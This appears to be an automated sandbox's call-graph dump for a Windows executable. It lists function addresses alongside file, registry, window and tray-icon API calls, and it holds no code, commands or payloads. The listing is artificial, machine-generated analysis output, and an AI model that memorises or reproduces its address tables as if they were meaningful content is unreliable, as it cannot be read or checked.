LeaveCriticalSection LeaveCriticalSection _fprintf 99117->99131 99118 e3557e 99163 e38ff6 9 API calls __beginthread 99118->99163 99121 e35599 99119->99121 99132 e40dc7 99121->99132 99124 e34916 __fseek_nolock 58 API calls 99125 e355a7 99124->99125 99136 e40c52 99125->99136 99127 e355ad 99127->99117 99128 e32f95 _free 58 API calls 99127->99128 99128->99117 99129->99015 99130->99019 99131->99019 99133 e355a1 99132->99133 99134 e40dd4 99132->99134 99133->99124 99134->99133 99135 e32f95 _free 58 API calls 99134->99135 99135->99133 99137 e40c5e __getstream 99136->99137 99138 e40c82 99137->99138 99139 e40c6b 99137->99139 99141 e40d0d 99138->99141 99143 e40c92 99138->99143 99188 e38d34 58 API calls __getptd_noexit 99139->99188 99193 e38d34 58 API calls __getptd_noexit 99141->99193 99142 e40c70 99189 e38d68 58 API calls __getptd_noexit 99142->99189 99146 e40cb0 99143->99146 99147 e40cba 99143->99147 99190 e38d34 58 API calls __getptd_noexit 99146->99190 99164 e3d446 99147->99164 99148 e40cb5 99194 e38d68 58 API calls __getptd_noexit 99148->99194 99152 e40cc0 99153 e40cd3 99152->99153 99154 e40cde 99152->99154 99173 e40d2d 99153->99173 99191 e38d68 58 API calls __getptd_noexit 99154->99191 99155 e40d19 99195 e38ff6 9 API calls __beginthread 99155->99195 99157 e40c77 __getstream 99157->99127 99160 e40cd9 99192 e40d05 LeaveCriticalSection __unlock_fhandle 99160->99192 99162->99118 99163->99117 99165 e3d452 __getstream 99164->99165 99166 e3d4a1 EnterCriticalSection 99165->99166 99167 e39e4b __lock 58 API calls 99165->99167 99169 e3d4c7 __getstream 99166->99169 99168 e3d477 99167->99168 99170 e3d48f 99168->99170 99196 e3a06b InitializeCriticalSectionAndSpinCount 99168->99196 99169->99152 99197 e3d4cb LeaveCriticalSection _doexit 99170->99197 99198 e3d703 99173->99198 99175 e40d91 99211 e3d67d 59 API calls 2 library calls 99175->99211 99176 e40d3b 99176->99175 99178 e3d703 __lseek_nolock 58 API calls 99176->99178 99187 e40d6f 99176->99187 99181 e40d66 99178->99181 99179 e3d703 __lseek_nolock 58 API calls 99182 e40d7b FindCloseChangeNotification 99179->99182 99180 e40d99 99183 e40dbb 99180->99183 99212 e38d47 58 API calls 3 library calls 99180->99212 99185 e3d703 __lseek_nolock 58 API calls 99181->99185 99182->99175 99186 e40d87 GetLastError 99182->99186 99183->99160 99185->99187 99186->99175 99187->99175 99187->99179 99188->99142 99189->99157 99190->99148 99191->99160 99192->99157 99193->99148 99194->99155 99195->99157 99196->99170 99197->99166 99199 e3d723 99198->99199 99200 e3d70e 99198->99200 99203 e38d34 __close 58 API calls 99199->99203 99205 e3d748 99199->99205 99201 e38d34 __close 58 API calls 99200->99201 99202 e3d713 99201->99202 99204 e38d68 __beginthread 58 API calls 99202->99204 99206 e3d752 99203->99206 99208 e3d71b 99204->99208 99205->99176 99207 e38d68 __beginthread 58 API calls 99206->99207 99209 e3d75a 99207->99209 99208->99176 99210 e38ff6 __beginthread 9 API calls 99209->99210 99210->99208 99211->99180 99212->99183 99275 e41b90 99213->99275 99216 e148f7 99281 e17eec 99216->99281 99217 e148da 99219 e17d2c 59 API calls 99217->99219 99220 e148e6 99219->99220 99277 e17886 99220->99277 99223 e309d5 99224 e41b90 __write_nolock 99223->99224 99225 e309e2 GetLongPathNameW 99224->99225 99226 e17d2c 59 API calls 99225->99226 99227 e1741d 99226->99227 99228 e1716b 99227->99228 99229 e177c7 59 API calls 99228->99229 99230 e1717d 99229->99230 99231 e148ae 60 API calls 99230->99231 99232 e17188 99231->99232 99233 e17193 99232->99233 99234 e4ecae 99232->99234 99235 e13f84 59 API calls 99233->99235 99239 e4ecc8 99234->99239 99295 e17a68 61 API calls 99234->99295 99237 e1719f 99235->99237 99289 e134c2 99237->99289 99240 e171b2 Mailbox 99240->98146 99242 e14f3d 136 API calls 99241->99242 99243 e169ef 99242->99243 99244 e4e45a 99243->99244 99246 e14f3d 136 API calls 99243->99246 99245 e797e5 122 API calls 99244->99245 99247 e4e46f 99245->99247 99248 e16a03 99246->99248 99249 e4e490 99247->99249 99250 e4e473 99247->99250 99248->99244 99251 e16a0b 99248->99251 99253 e30ff6 Mailbox 59 API calls 99249->99253 99252 e14faa 84 API calls 99250->99252 99254 e16a17 99251->99254 99255 e4e47b 99251->99255 99252->99255 99274 e4e4d5 Mailbox 99253->99274 99296 e16bec 99254->99296 99406 e74534 90 API calls _wprintf 99255->99406 99259 e4e489 99259->99249 99260 e4e689 99261 e32f95 _free 58 API calls 99260->99261 99262 e4e691 99261->99262 99263 e14faa 84 API calls 99262->99263 99268 e4e69a 99263->99268 99267 e32f95 _free 58 API calls 99267->99268 99268->99267 99269 e14faa 84 API calls 99268->99269 99409 e6fcb1 89 API calls 4 library calls 99268->99409 99269->99268 99271 e17f41 59 API calls 99271->99274 99274->99260 99274->99268 99274->99271 99389 e6fc4d 99274->99389 99392 e1766f 99274->99392 99400 e174bd 99274->99400 99407 e6fb6e 61 API calls 2 library calls 99274->99407 99408 e77621 59 API calls Mailbox 99274->99408 99276 e148bb GetFullPathNameW 99275->99276 99276->99216 99276->99217 99278 e17894 99277->99278 99285 e17e8c 99278->99285 99280 e148f2 99280->99223 99282 e17f06 99281->99282 99283 e17ef9 99281->99283 99284 e30ff6 Mailbox 59 API calls 99282->99284 99283->99220 99284->99283 99286 e17e9a 99285->99286 99288 e17ea3 _memmove 99285->99288 99287 e17faf 59 API calls 99286->99287 99286->99288 99287->99288 99288->99280 99290 e134d4 99289->99290 99294 e134f3 _memmove 99289->99294 99293 e30ff6 Mailbox 59 API calls 99290->99293 99291 e30ff6 Mailbox 59 API calls 99292 e1350a 99291->99292 99292->99240 99293->99294 99294->99291 99295->99234 99297 e4e847 99296->99297 99298 e16c15 99296->99298 99501 e6fcb1 89 API calls 4 library calls 99297->99501 99415 e15906 60 API calls Mailbox 99298->99415 99301 e4e85a 99502 e6fcb1 89 API calls 4 library calls 99301->99502 99302 e16c37 99416 e15956 99302->99416 99306 e16c54 99308 e177c7 59 API calls 99306->99308 99307 e4e876 99338 e16cc1 99307->99338 99309 e16c60 99308->99309 99429 e30b9b 60 API calls __write_nolock 99309->99429 99311 e16c6c 99314 e177c7 59 API calls 99311->99314 99312 e4e889 99315 e15dcf CloseHandle 99312->99315 99313 e16ccf 99316 e177c7 59 API calls 99313->99316 99317 e16c78 99314->99317 99318 e4e895 99315->99318 99319 e16cd8 99316->99319 99320 e148ae 60 API calls 99317->99320 99321 e14f3d 136 API calls 99318->99321 99322 e177c7 59 API calls 99319->99322 99323 e16c86 99320->99323 99324 e4e8b1 99321->99324 99325 e16ce1 99322->99325 99430 e159b0 ReadFile SetFilePointerEx 99323->99430 99327 e4e8da 99324->99327 99332 e797e5 122 API calls 99324->99332 99439 e146f9 99325->99439 99503 e6fcb1 89 API calls 4 library calls 99327->99503 99329 e16cf8 99333 e17c8e 59 API calls 99329->99333 99331 e16cb2 99431 e15c4e 99331->99431 99336 e4e8cd 99332->99336 99337 e16d09 SetCurrentDirectoryW 99333->99337 99334 e4e8f1 99367 e16e6c Mailbox 99334->99367 99339 e4e8d5 99336->99339 99340 e4e8f6 99336->99340 99345 e16d1c Mailbox 99337->99345 99338->99312 99338->99313 99341 e14faa 84 API calls 99339->99341 99342 e14faa 84 API calls 99340->99342 99341->99327 99343 e4e8fb 99342->99343 99344 e30ff6 Mailbox 59 API calls 99343->99344 99351 e4e92f 99344->99351 99347 e30ff6 Mailbox 59 API calls 99345->99347 99349 e16d2f 99347->99349 99348 e13bcd 99348->98008 99348->98030 99350 e1538e 59 API calls 99349->99350 99378 e16d3a Mailbox __wsetenvp 99350->99378 99352 e1766f 59 API calls 99351->99352 99386 e4e978 Mailbox 99352->99386 99353 e16e47 99497 e15dcf 99353->99497 99354 e4eb69 99507 e77581 59 API calls Mailbox 99354->99507 99360 e4eb8b 99508 e7f835 59 API calls 2 library calls 99360->99508 99363 e4eb98 99365 e32f95 _free 58 API calls 99363->99365 99364 e4ec02 99511 e6fcb1 89 API calls 4 library calls 99364->99511 99365->99367 99410 e15934 99367->99410 99369 e1766f 59 API calls 99369->99386 99370 e4ec1b 99370->99353 99372 e4ebfa 99510 e6fb07 59 API calls 4 library calls 99372->99510 99375 e17f41 59 API calls 99375->99378 99377 e6fc4d 59 API calls 99377->99386 99378->99353 99378->99364 99378->99372 99378->99375 99490 e159cd 67 API calls _wcscpy 99378->99490 99491 e170bd GetStringTypeW 99378->99491 99492 e1702c 60 API calls __wcsnicmp 99378->99492 99493 e1710a GetStringTypeW __wsetenvp 99378->99493 99494 e3387d GetStringTypeW _iswctype 99378->99494 99495 e16a3c 165 API calls 3 library calls 99378->99495 99496 e17373 59 API calls Mailbox 99378->99496 99379 e17f41 59 API calls 99379->99386 99383 e4ebbb 99509 e6fcb1 89 API calls 4 library calls 99383->99509 99385 e4ebd4 99387 e32f95 _free 58 API calls 99385->99387 99386->99354 99386->99369 99386->99377 99386->99379 99386->99383 99504 e6fb6e 61 API calls 2 library calls 99386->99504 99505 e77621 59 API calls Mailbox 99386->99505 99506 e17373 59 API calls Mailbox 99386->99506 99388 e4ebe7 99387->99388 99388->99367 99390 e30ff6 Mailbox 59 API calls 99389->99390 99391 e6fc7d _memmove 99390->99391 99391->99274 99393 e1770f 99392->99393 99399 e17682 _memmove 99392->99399 99396 e30ff6 Mailbox 59 API calls 99393->99396 99394 e30ff6 Mailbox 59 API calls 99395 e17689 99394->99395 99397 e30ff6 Mailbox 59 API calls 99395->99397 99398 e176b2 99395->99398 99396->99399 99397->99398 99398->99274 99399->99394 99401 e174d0 99400->99401 99404 e1757e 99400->99404 99403 e30ff6 Mailbox 59 API calls 99401->99403 99405 e17502 99401->99405 99402 e30ff6 59 API calls Mailbox 99402->99405 99403->99405 99404->99274 99405->99402 99405->99404 99406->99259 99407->99274 99408->99274 99409->99268 99411 e15dcf CloseHandle 99410->99411 99412 e1593c Mailbox 99411->99412 99413 e15dcf CloseHandle 99412->99413 99414 e1594b 99413->99414 99414->99348 99415->99302 99417 e15dcf CloseHandle 99416->99417 99418 e15962 99417->99418 99512 e15df9 99418->99512 99420 e15981 99421 e159a4 99420->99421 99520 e15770 99420->99520 99421->99301 99421->99306 99423 e15993 99537 e153db SetFilePointerEx SetFilePointerEx 99423->99537 99425 e1599a 99425->99421 99426 e4e030 99425->99426 99538 e73696 SetFilePointerEx SetFilePointerEx WriteFile 99426->99538 99428 e4e060 99428->99421 99429->99311 99430->99331 99438 e15c68 99431->99438 99432 e4e151 99552 e15dae SetFilePointerEx 99432->99552 99433 e15cef SetFilePointerEx 99551 e15dae SetFilePointerEx 99433->99551 99436 e15cc3 99436->99338 99437 e4e16b 99438->99432 99438->99433 99438->99436 99440 e177c7 59 API calls 99439->99440 99441 e1470f 99440->99441 99442 e177c7 59 API calls 99441->99442 99443 e14717 99442->99443 99444 e177c7 59 API calls 99443->99444 99445 e1471f 99444->99445 99446 e177c7 59 API calls 99445->99446 99447 e14727 99446->99447 99448 e1475b 99447->99448 99449 e4d8fb 99447->99449 99450 e179ab 59 API calls 99448->99450 99451 e181a7 59 API calls 99449->99451 99452 e14769 99450->99452 99453 e4d904 99451->99453 99454 e17e8c 59 API calls 99452->99454 99455 e17eec 59 API calls 99453->99455 99456 e14773 99454->99456 99458 e1479e 99455->99458 99457 e179ab 59 API calls 99456->99457 99456->99458 99459 e14794 99457->99459 99460 e147bd 99458->99460 99473 e147de 99458->99473 99475 e4d924 99458->99475 99462 e17e8c 59 API calls 99459->99462 99464 e17b52 59 API calls 99460->99464 99462->99458 99463 e4d9f4 99467 e17d2c 59 API calls 99463->99467 99468 e147c7 99464->99468 99465 e147ef 99466 e14801 99465->99466 99469 e181a7 59 API calls 99465->99469 99470 e14811 99466->99470 99471 e181a7 59 API calls 99466->99471 99485 e4d9b1 99467->99485 99472 e179ab 59 API calls 99468->99472 99468->99473 99469->99466 99474 e181a7 59 API calls 99470->99474 99476 e14818 99470->99476 99471->99470 99472->99473 99553 e179ab 99473->99553 99474->99476 99475->99463 99477 e4d9dd 99475->99477 99483 e4d95b 99475->99483 99478 e181a7 59 API calls 99476->99478 99487 e1481f Mailbox 99476->99487 99477->99463 99479 e4d9c8 99477->99479 99478->99487 99482 e17d2c 59 API calls 99479->99482 99480 e4d9b9 99481 e17d2c 59 API calls 99480->99481 99481->99485 99482->99485 99483->99480 99488 e4d9a4 99483->99488 99484 e17b52 59 API calls 99484->99485 99485->99473 99485->99484 99566 e17a84 59 API calls 2 library calls 99485->99566 99487->99329 99489 e17d2c 59 API calls 99488->99489 99489->99485 99490->99378 99491->99378 99492->99378 99493->99378 99494->99378 99495->99378 99496->99378 99498 e15dd9 99497->99498 99499 e15de8 99497->99499 99499->99498 99501->99301 99502->99307 99503->99334 99504->99386 99505->99386 99506->99386 99507->99360 99508->99363 99509->99385 99510->99364 99511->99370 99513 e15e12 CreateFileW 99512->99513 99514 e4e181 99512->99514 99515 e15e34 99513->99515 99514->99515 99516 e4e187 CreateFileW 99514->99516 99515->99420 99516->99515 99517 e4e1ad 99516->99517 99518 e15c4e 2 API calls 99517->99518 99519 e4e1b8 99518->99519 99519->99515 99521 e4dfce 99520->99521 99522 e1578b 99520->99522 99536 e1581a 99521->99536 99545 e15e3f 99521->99545 99523 e15c4e 2 API calls 99522->99523 99522->99536 99524 e157ad 99523->99524 99525 e1538e 59 API calls 99524->99525 99527 e157b7 99525->99527 99527->99521 99528 e157c4 99527->99528 99529 e30ff6 Mailbox 59 API calls 99528->99529 99530 e157cf 99529->99530 99531 e1538e 59 API calls 99530->99531 99532 e157da 99531->99532 99539 e15d20 99532->99539 99534 e15807 99535 e15c4e 2 API calls 99534->99535 99535->99536 99536->99423 99537->99425 99538->99428 99540 e15d93 99539->99540 99541 e15d2e 99539->99541 99550 e15dae SetFilePointerEx 99540->99550 99542 e15d56 99541->99542 99544 e15d66 ReadFile 99541->99544 99542->99534 99544->99541 99544->99542 99546 e15c4e 2 API calls 99545->99546 99547 e15e60 99546->99547 99548 e15c4e 2 API calls 99547->99548 99549 e15e74 99548->99549 99549->99536 99550->99541 99551->99436 99552->99437 99554 e17a17 99553->99554 99555 e179ba 99553->99555 99556 e17e8c 59 API calls 99554->99556 99555->99554 99557 e179c5 99555->99557 99558 e179e8 _memmove 99556->99558 99559 e179e0 99557->99559 99560 e4ef32 99557->99560 99558->99465 99567 e18087 59 API calls Mailbox 99559->99567 99568 e18189 99560->99568 99563 e4ef3c 99564 e30ff6 Mailbox 59 API calls 99563->99564 99565 e4ef5c 99564->99565 99566->99485 99567->99558 99569 e30ff6 Mailbox 59 API calls 99568->99569 99570 e18193 99569->99570 99570->99563 99571->98157 99573 e16ef5 99572->99573 99577 e17009 99572->99577 99574 e30ff6 Mailbox 59 API calls 99573->99574 99573->99577 99576 e16f1c 99574->99576 99575 e30ff6 Mailbox 59 API calls 99582 e16f91 99575->99582 99576->99575 99577->98161 99580 e174bd 59 API calls 99580->99582 99581 e1766f 59 API calls 99581->99582 99582->99577 99582->99580 99582->99581 99585 e163a0 99582->99585 99610 e66ac9 59 API calls Mailbox 99582->99610 99583->98164 99584->98166 99611 e17b76 99585->99611 99587 e165ca 99588 e1766f 59 API calls 99587->99588 99589 e165e4 Mailbox 99588->99589 99589->99582 99592 e163c5 99592->99587 99593 e4e41f 99592->99593 99594 e168f9 _memmove 99592->99594 99599 e1766f 59 API calls 99592->99599 99600 e17eec 59 API calls 99592->99600 99603 e4e3bb 99592->99603 99607 e17faf 59 API calls 99592->99607 99616 e160cc 60 API calls 99592->99616 99617 e15ea1 59 API calls Mailbox 99592->99617 99618 e15fd2 60 API calls 99592->99618 99619 e17a84 59 API calls 2 library calls 99592->99619 99620 e6fdba 91 API calls 4 library calls 99593->99620 99621 e6fdba 91 API calls 4 library calls 99594->99621 99597 e4e42d 99601 e1766f 59 API calls 99597->99601 99599->99592 99600->99592 99604 e18189 59 API calls 99603->99604 99605 e4e3c6 99604->99605 99609 e30ff6 Mailbox 59 API calls 99605->99609 99608 e1659b CharUpperBuffW 99607->99608 99608->99592 99609->99594 99610->99582 99612 e30ff6 Mailbox 59 API calls 99611->99612 99613 e17b9b 99612->99613 99614 e18189 59 API calls 99613->99614 99615 e17baa 99614->99615 99615->99592 99616->99592 99617->99592 99618->99592 99619->99592 99620->99597 99621->99589 99622->98179 99623->98180 99625 e14227 99624->99625 99626 e4d638 99624->99626 99625->98186 99650 e73226 62 API calls _W_store_winword 99625->99650 99626->99625 99627 e4d641 DestroyIcon 99626->99627 99627->99625 99650->98186 99713->98206 99714->98206 99715->98206 100154 e13633 100155 e1366a 100154->100155 100156 e136e7 100155->100156 100157 e13688 100155->100157 100194 e136e5 100155->100194 100159 e4d31c 100156->100159 100160 e136ed 100156->100160 100161 e13695 100157->100161 100162 e1375d PostQuitMessage 100157->100162 100158 e136ca DefWindowProcW 100196 e136d8 100158->100196 100204 e211d0 10 API calls Mailbox 100159->100204 100163 e136f2 100160->100163 100164 e13715 SetTimer RegisterWindowMessageW 100160->100164 100165 e136a0 100161->100165 100166 e4d38f 100161->100166 100162->100196 100168 e136f9 KillTimer 100163->100168 100169 e4d2bf 100163->100169 100170 e1373e CreatePopupMenu 100164->100170 100164->100196 100171 e13767 100165->100171 100172 e136a8 100165->100172 100208 e72a16 71 API calls _memset 100166->100208 100199 e144cb Shell_NotifyIconW _memset 100168->100199 100176 e4d2c4 100169->100176 100177 e4d2f8 MoveWindow 100169->100177 100170->100196 100202 e14531 64 API calls _memset 100171->100202 100179 e4d374 100172->100179 100180 e136b3 100172->100180 100174 e4d343 100205 e211f3 341 API calls Mailbox 100174->100205 100185 e4d2e7 SetFocus 100176->100185 100186 e4d2c8 100176->100186 100177->100196 100179->100158 100207 e6817e 59 API calls Mailbox 100179->100207 100183 e136be 100180->100183 100188 e1374b 100180->100188 100181 e4d3a1 100181->100158 100181->100196 100183->100158 100206 e144cb Shell_NotifyIconW _memset 100183->100206 100184 e1375b 100184->100196 100185->100196 100186->100183 100189 e4d2d1 100186->100189 100187 e1370c 100200 e13114 DeleteObject DestroyWindow Mailbox 100187->100200 100201 e145df 81 API calls _memset 100188->100201 100203 e211d0 10 API calls Mailbox 100189->100203 100194->100158 100197 e4d368 100198 e143db 68 API calls 100197->100198 100198->100194 100199->100187 100200->100196 100201->100184 100202->100184 100203->100196 100204->100174 100205->100183 100206->100197 100207->100194 100208->100181 100209 e4ff06 100210 e4ff10 100209->100210 100225 e1ac90 Mailbox _memmove 100209->100225 100410 e18e34 59 API calls Mailbox 100210->100410 100211 e30ff6 59 API calls Mailbox 100211->100225 100218 e1b5d5 100222 e181a7 59 API calls 100218->100222 100219 e1a6ba 100418 e7a0b5 89 API calls 4 library calls 100219->100418 100220 e1a1b7 100221 e30ff6 59 API calls Mailbox 100235 e1a097 Mailbox 100221->100235 100222->100220 100223 e5047f 100414 e7a0b5 89 API calls 4 library calls 100223->100414 100224 e1b5da 100420 e7a0b5 89 API calls 4 library calls 100224->100420 100225->100211 100225->100220 100230 e17f41 59 API calls 100225->100230 100231 e1b685 100225->100231 100225->100235 100241 e8bf80 341 API calls 100225->100241 100243 e1b416 100225->100243 100244 e1a000 341 API calls 100225->100244 100246 e50c94 100225->100246 100248 e50ca2 100225->100248 100251 e1b37c 100225->100251 100258 e1ade2 Mailbox 100225->100258 100363 e8c5f4 100225->100363 100395 e77be0 100225->100395 100401 e666f4 100225->100401 100411 e67405 59 API calls 100225->100411 100412 e8c4a7 85 API calls 2 library calls 100225->100412 100227 e181a7 59 API calls 100227->100235 100230->100225 100415 e7a0b5 89 API calls 4 library calls 100231->100415 100232 e177c7 59 API calls 100232->100235 100233 e67405 59 API calls 100233->100235 100234 e5048e 100235->100218 100235->100219 100235->100220 100235->100221 100235->100223 100235->100224 100235->100227 100235->100232 100235->100233 100238 e50e00 100235->100238 100240 e32f80 67 API calls __cinit 100235->100240 100404 e1ca20 341 API calls 2 library calls 100235->100404 100405 e1ba60 60 API calls Mailbox 100235->100405 100237 e666f4 Mailbox 59 API calls 100237->100220 100419 e7a0b5 89 API calls 4 library calls 100238->100419 100240->100235 100241->100225 100409 e1f803 341 API calls 100243->100409 100244->100225 100416 e19df0 59 API calls Mailbox 100246->100416 100417 e7a0b5 89 API calls 4 library calls 100248->100417 100250 e50c86 100250->100220 100250->100237 100407 e19e9c 60 API calls Mailbox 100251->100407 100253 e1b38d 100408 e19e9c 60 API calls Mailbox 100253->100408 100258->100220 100258->100231 100258->100250 100259 e500e0 VariantClear 100258->100259 100264 e22123 100258->100264 100304 e7d2e6 100258->100304 100351 e8e237 100258->100351 100354 e8474d 100258->100354 100406 e19df0 59 API calls Mailbox 100258->100406 100413 e67405 59 API calls 100258->100413 100259->100258 100421 e19bf8 100264->100421 100268 e30ff6 Mailbox 59 API calls 100269 e22154 100268->100269 100271 e22164 100269->100271 100449 e15906 60 API calls Mailbox 100269->100449 100274 e19997 84 API calls 100271->100274 100272 e569af 100273 e22189 100272->100273 100453 e7f7df 59 API calls 100272->100453 100279 e22196 100273->100279 100454 e19c9c 59 API calls 100273->100454 100276 e22172 100274->100276 100278 e15956 67 API calls 100276->100278 100277 e569f7 100277->100279 100280 e569ff 100277->100280 100281 e22181 100278->100281 100282 e15e3f 2 API calls 100279->100282 100455 e19c9c 59 API calls 100280->100455 100281->100272 100281->100273 100452 e15a1a CloseHandle 100281->100452 100285 e2219d 100282->100285 100286 e56a11 100285->100286 100287 e221b7 100285->100287 100289 e30ff6 Mailbox 59 API calls 100286->100289 100288 e177c7 59 API calls 100287->100288 100290 e221bf 100288->100290 100291 e56a17 100289->100291 100434 e156d2 100290->100434 100293 e56a2b 100291->100293 100456 e159b0 ReadFile SetFilePointerEx 100291->100456 100298 e56a2f _memmove 100293->100298 100457 e7794e 59 API calls 2 library calls 100293->100457 100296 e221ce 100296->100298 100450 e19b9c 59 API calls Mailbox 100296->100450 100299 e221e2 Mailbox 100300 e2221c 100299->100300 100301 e15dcf CloseHandle 100299->100301 100300->100258 100302 e22210 100301->100302 100302->100300 100451 e15a1a CloseHandle 100302->100451 100305 e7d310 100304->100305 100306 e7d305 100304->100306 100309 e177c7 59 API calls 100305->100309 100349 e7d3ea Mailbox 100305->100349 100495 e19c9c 59 API calls 100306->100495 100308 e30ff6 Mailbox 59 API calls 100310 e7d433 100308->100310 100311 e7d334 100309->100311 100312 e7d43f 100310->100312 100498 e15906 60 API calls Mailbox 100310->100498 100313 e177c7 59 API calls 100311->100313 100315 e19997 84 API calls 100312->100315 100316 e7d33d 100313->100316 100317 e7d457 100315->100317 100318 e19997 84 API calls 100316->100318 100319 e15956 67 API calls 100317->100319 100320 e7d349 100318->100320 100321 e7d466 100319->100321 100322 e146f9 59 API calls 100320->100322 100323 e7d49e 100321->100323 100324 e7d46a GetLastError 100321->100324 100325 e7d35e 100322->100325 100328 e7d500 100323->100328 100329 e7d4c9 100323->100329 100326 e7d483 100324->100326 100327 e17c8e 59 API calls 100325->100327 100348 e7d3f3 Mailbox 100326->100348 100499 e15a1a CloseHandle 100326->100499 100330 e7d391 100327->100330 100333 e30ff6 Mailbox 59 API calls 100328->100333 100331 e30ff6 Mailbox 59 API calls 100329->100331 100332 e7d3e3 100330->100332 100337 e73e73 3 API calls 100330->100337 100334 e7d4ce 100331->100334 100497 e19c9c 59 API calls 100332->100497 100338 e7d505 100333->100338 100339 e7d4df 100334->100339 100342 e177c7 59 API calls 100334->100342 100340 e7d3a1 100337->100340 100341 e177c7 59 API calls 100338->100341 100338->100348 100500 e7f835 59 API calls 2 library calls 100339->100500 100340->100332 100343 e7d3a5 100340->100343 100341->100348 100342->100339 100345 e17f41 59 API calls 100343->100345 100346 e7d3b2 100345->100346 100496 e73c66 63 API calls Mailbox 100346->100496 100348->100258 100349->100308 100349->100348 100350 e7d3bb Mailbox 100350->100332 100352 e8cdf1 130 API calls 100351->100352 100353 e8e247 100352->100353 100353->100258 100355 e19997 84 API calls 100354->100355 100356 e84787 100355->100356 100357 e163a0 94 API calls 100356->100357 100358 e84797 100357->100358 100359 e847bc 100358->100359 100360 e1a000 341 API calls 100358->100360 100361 e19bf8 59 API calls 100359->100361 100362 e847c0 100359->100362 100360->100359 100361->100362 100362->100258 100364 e177c7 59 API calls 100363->100364 100365 e8c608 100364->100365 100366 e177c7 59 API calls 100365->100366 100367 e8c610 100366->100367 100368 e177c7 59 API calls 100367->100368 100369 e8c618 100368->100369 100370 e19997 84 API calls 100369->100370 100371 e8c626 100370->100371 100372 e8c83c Mailbox 100371->100372 100373 e17d2c 59 API calls 100371->100373 100374 e8c80f 100371->100374 100375 e8c7f6 100371->100375 100377 e8c811 100371->100377 100378 e181a7 59 API calls 100371->100378 100380 e17a84 59 API calls 100371->100380 100385 e17faf 59 API calls 100371->100385 100387 e17faf 59 API calls 100371->100387 100392 e19997 84 API calls 100371->100392 100393 e17e0b 59 API calls 100371->100393 100394 e17c8e 59 API calls 100371->100394 100372->100225 100373->100371 100374->100372 100503 e19b9c 59 API calls Mailbox 100374->100503 100379 e17e0b 59 API calls 100375->100379 100381 e17e0b 59 API calls 100377->100381 100378->100371 100382 e8c803 100379->100382 100380->100371 100384 e8c820 100381->100384 100383 e17c8e 59 API calls 100382->100383 100383->100374 100386 e17c8e 59 API calls 100384->100386 100388 e8c6bd CharUpperBuffW 100385->100388 100386->100374 100389 e8c77d CharUpperBuffW 100387->100389 100501 e1859a 68 API calls 100388->100501 100502 e1c707 69 API calls 2 library calls 100389->100502 100392->100371 100393->100371 100394->100371 100396 e77bec 100395->100396 100397 e30ff6 Mailbox 59 API calls 100396->100397 100398 e77bfa 100397->100398 100399 e77c08 100398->100399 100400 e177c7 59 API calls 100398->100400 100399->100225 100400->100399 100504 e66636 100401->100504 100403 e66702 100403->100225 100404->100235 100405->100235 100406->100258 100407->100253 100408->100243 100409->100231 100410->100225 100411->100225 100412->100225 100413->100258 100414->100234 100415->100250 100416->100250 100417->100250 100418->100220 100419->100224 100420->100220 100422 e19c08 100421->100422 100423 e4fbff 100421->100423 100428 e30ff6 Mailbox 59 API calls 100422->100428 100424 e4fc10 100423->100424 100425 e17d2c 59 API calls 100423->100425 100426 e17eec 59 API calls 100424->100426 100425->100424 100427 e4fc1a 100426->100427 100431 e177c7 59 API calls 100427->100431 100433 e19c34 100427->100433 100429 e19c1b 100428->100429 100429->100427 100430 e19c26 100429->100430 100432 e17f41 59 API calls 100430->100432 100430->100433 100431->100433 100432->100433 100433->100268 100433->100272 100435 e15702 100434->100435 100436 e156dd 100434->100436 100437 e17eec 59 API calls 100435->100437 100436->100435 100440 e156ec 100436->100440 100441 e7349a 100437->100441 100438 e734c9 100438->100296 100460 e15c18 100440->100460 100441->100438 100458 e73436 ReadFile SetFilePointerEx 100441->100458 100459 e17a84 59 API calls 2 library calls 100441->100459 100448 e735d8 Mailbox 100448->100296 100449->100271 100450->100299 100451->100300 100452->100272 100453->100272 100454->100277 100455->100285 100456->100293 100457->100298 100458->100441 100459->100441 100461 e30ff6 Mailbox 59 API calls 100460->100461 100462 e15c2b 100461->100462 100463 e30ff6 Mailbox 59 API calls 100462->100463 100464 e15c37 100463->100464 100465 e15632 100464->100465 100472 e15a2f 100465->100472 100467 e15674 100467->100448 100471 e1793a 61 API calls Mailbox 100467->100471 100468 e15d20 2 API calls 100469 e15643 100468->100469 100469->100467 100469->100468 100479 e15bda 100469->100479 100471->100448 100473 e4e065 100472->100473 100474 e15a40 100472->100474 100488 e66443 59 API calls Mailbox 100473->100488 100474->100469 100476 e4e06f 100477 e30ff6 Mailbox 59 API calls 100476->100477 100478 e4e07b 100477->100478 100480 e4e117 100479->100480 100481 e15bee 100479->100481 100494 e66443 59 API calls Mailbox 100480->100494 100489 e15b19 100481->100489 100484 e15bfa 100484->100469 100485 e4e122 100486 e30ff6 Mailbox 59 API calls 100485->100486 100487 e4e137 _memmove 100486->100487 100488->100476 100490 e15b31 100489->100490 100493 e15b2a _memmove 100489->100493 100491 e30ff6 Mailbox 59 API calls 100490->100491 100492 e4e0a7 100490->100492 100491->100493 100493->100484 100494->100485 100495->100305 100496->100350 100497->100349 100498->100312 100499->100348 100500->100348 100501->100371 100502->100371 100503->100372 100505 e6665e 100504->100505 100506 e66641 100504->100506 100505->100403 100506->100505 100508 e66621 59 API calls Mailbox 100506->100508 100508->100506 100509 e50226 100518 e1ade2 Mailbox 100509->100518 100510 e1b6c1 100525 e7a0b5 89 API calls 4 library calls 100510->100525 100512 e50c86 100513 e666f4 Mailbox 59 API calls 100512->100513 100514 e50c8f 100513->100514 100516 e500e0 VariantClear 100516->100518 100518->100510 100518->100512 100518->100514 100518->100516 100519 e7d2e6 101 API calls 100518->100519 100520 e22123 95 API calls 100518->100520 100521 e8474d 341 API calls 100518->100521 100522 e8e237 130 API calls 100518->100522 100523 e19df0 59 API calls Mailbox 100518->100523 100524 e67405 59 API calls 100518->100524 100519->100518 100520->100518 100521->100518 100522->100518 100523->100518 100524->100518 100525->100512 100526 e11055 100531 e12649 100526->100531 100529 e32f80 __cinit 67 API calls 100530 e11064 100529->100530 100532 e177c7 59 API calls 100531->100532 100533 e126b7 100532->100533 100538 e13582 100533->100538 100536 e12754 100537 e1105a 100536->100537 100541 e13416 59 API calls 2 library calls 100536->100541 100537->100529 100542 e135b0 100538->100542 100541->100536 100543 e135bd 100542->100543 100544 e135a1 100542->100544 100543->100544 100545 e135c4 RegOpenKeyExW 100543->100545 100544->100536 100545->100544 100546 e135de RegQueryValueExW 100545->100546 100547 e13614 RegCloseKey 100546->100547 100548 e135ff 100546->100548 100547->100544 100548->100547 100549 d423b0 100563 d40000 100549->100563 100551 d42442 100566 d422a0 100551->100566 100569 d43470 